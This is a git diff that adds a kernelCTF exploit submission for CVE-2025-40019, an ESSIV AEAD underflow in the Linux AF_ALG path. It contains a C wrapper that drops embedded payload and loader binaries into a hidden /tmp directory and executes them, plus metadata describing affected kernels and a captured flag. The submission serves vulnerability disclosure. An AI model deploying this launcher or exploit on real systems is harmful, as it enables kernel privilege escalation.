--git 
a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/wrapper.c b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/wrapper.c new file mode 100644 index 000000000..841d77fab --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/wrapper.c @@ -0,0 +1,63 @@ +#define _GNU_SOURCE +#include <errno.h> +#include <fcntl.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <sys/stat.h> +#include <sys/types.h> +#include <unistd.h> + +extern const unsigned char _binary_payload_bin_start[]; +extern const unsigned char _binary_payload_bin_end[]; +extern const unsigned char _binary_ld_bin_start[]; +extern const unsigned char _binary_ld_bin_end[]; +extern const unsigned char _binary_libc_bin_start[]; +extern const unsigned char _binary_libc_bin_end[]; + +static void write_blob(const char *path, const unsigned char *start, + const unsigned char *end, mode_t mode) +{ + int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode); + if (fd < 0) { + perror(path); + _exit(127); + } + + const unsigned char *p = start; + while (p < end) { + ssize_t n = write(fd, p, end - p); + if (n < 0) { + if (errno == EINTR) + continue; + perror("write"); + _exit(127); + } + p += n; + } + close(fd); + chmod(path, mode); +} + +int main(int argc, char **argv) +{ + const char *dir = "/tmp/exp/.exp505"; + const char *payload = "/tmp/exp/.exp505/payload"; + const char *ldso = "/tmp/exp/.exp505/ld-linux-x86-64.so.2"; + const char *libc = "/tmp/exp/.exp505/libc.so.6"; + + mkdir("/tmp/exp", 0755); + mkdir(dir, 0755); + write_blob(payload, _binary_payload_bin_start, _binary_payload_bin_end, 0755); + write_blob(ldso, _binary_ld_bin_start, _binary_ld_bin_end, 0755); + write_blob(libc, _binary_libc_bin_start, _binary_libc_bin_end, 0755); + + if (argc > 1) { + execl(ldso, ldso, "--library-path", dir, payload, argv[1], NULL); + } else { + execl(ldso, ldso, "--library-path", dir, payload, NULL); + } + + perror("exec payload"); + return 127; +} diff --git
a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/metadata.json b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/metadata.json new file mode 100644 index 000000000..a4cdc24c2 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/metadata.json @@ -0,0 +1,26 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp505"], + "vulnerability": { + "summary": "ESSIV AEAD assoclen underflow in the AF_ALG decryption path", + "cve": "CVE-2025-40019", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6bb73db6948c2de23e407fe1b7ef94bf02b7529f", + "affected_versions": ["5.4 - 6.18"], + "requirements": { + "attack_surface": [], + "capabilities": [], + "kernel_config": [ + "CONFIG_CRYPTO_USER_API", + "CONFIG_CRYPTO_USER_API_AEAD", + "CONFIG_CRYPTO_ESSIV" + ] + } + }, + "exploits": { + "mitigation-v4-6.12": { + "uses": [], + "requires_separate_kaslr_leak": false, + "stability_notes": "Flag captured on the live mitigation-v4-6.12 target. This is a novelty-only follow-up submission for the huge-PUD adaptation; reliability has not yet been batch measured." + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/original.tar.gz b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/original.tar.gz new file mode 100644 index 000000000..abb1f36a9 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/original.tar.gz differ